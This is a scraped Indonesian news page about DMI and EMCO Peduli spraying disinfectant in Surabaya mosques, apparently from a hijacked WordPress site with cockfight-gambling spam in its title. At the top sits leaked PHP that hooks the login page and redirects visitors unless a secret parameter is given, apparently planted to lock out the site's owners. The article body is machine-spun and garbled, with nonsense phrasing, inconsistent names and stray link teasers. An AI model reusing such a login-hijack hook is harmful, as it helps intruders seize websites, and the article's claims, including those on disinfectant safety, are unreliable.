//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } DMI dan EMCO Peduli melakukan penyemprotan disinfektan di beberapa masjid di Surabaya | adu ayam bali_s128.net login_s128.live

DMI dan EMCO Peduli melakukan penyemprotan disinfektan di beberapa masjid di Surabaya

Jakarta TRIBUNNEWS.COM-EMCO dan Dewan Masjid Kota (DMI) Surabaya prihatin dengan adanya penyemprotan disinfektan gratis di masjid dan mushola di Surabaya.

” Kami akan mulai menyemprot mulai Senin depan. Sejauh ini, hampir 100 masjid dan mushola sudah menandatangani kesepakatan untuk menyemprotkan air, ” kata Mohamad Jamil, bendahara DMI, yang menjadi koordinator rencana tersebut. – Rencana padat penduduk. – Baca : Niat Mandi Wajib Sholat Sebelum Menjalankan Ibadah Puasa dan Tata Cara Ramadhan 1441H-Bacaan: Video Tenaga Medis Rawat Bayi Umur 3 Bulan Karena Ibu, Nenek dan Pamannya Mahkota Positif-Harapan Bisa Bantu Pemerintah Kurangi Penyebaran Virus Corona – baca teks lengkapnya: Harapan Arema FC Tuan Rumah HUT PSSI ke-90 – Sebelumnya, Emco Peduli juga melakukan penyemprotan disinfektan di banyak masjid dan tempat ibadah di Jabodetabek. Selain itu, ia juga melakukan kegiatan serupa di Makassar, Sulawesi Selatan.

Acara diadakan dan diakhiri di konser Nang Omah Wae untuk mengumpulkan donasi Covid-19 bersama Didi Kempot.

Desinfektan dapat disemprotkan di masjid dan musala tanpa menggunakan alkohol. Desinfektan yang diimpor Emco dari luar negeri ini diproduksi oleh Lanxes.

Disinfektan ini tidak beracun, ramah lingkungan dan bermanfaat bagi ternak dan manusia. Biasanya digunakan untuk menyemprot semua kendaraan yang memasuki area pertanian untuk menghindari membawa virus dari luar.

Emco Peduli juga mengeluarkan prosedur operasi standar (SOP) untuk semua staf di lokasi. Oleh karena itu, untuk penggunaan campuran, masker dan sarung tangan harus digunakan. Hanya setelah pencampuran dengan 95% air barulah keasaman menurun.

Meskipun ramah lingkungan dan bermanfaat bagi manusia, namun tidak dapat disemprotkan ke manusia. Hanya digunakan untuk menyemprot benda mati. Oleh karena itu, penyemprot juga harus menggunakan tindakan perlindungan pribadi yang komprehensif.

Pada awalnya, semua disinfektan impor, alat semprot, alat pelindung diri dan agen penyemprot disediakan oleh EMCO. Tim DMI di Surabaya, ” tambah Jameel. Oleh karena itu, ini tidak hanya setelah penyemprotan selesai. Ini penting agar virus yang menempel di tempat ibadah tersebut mati.

Leave a comment

adu ayam bali_s128.net login_s128.live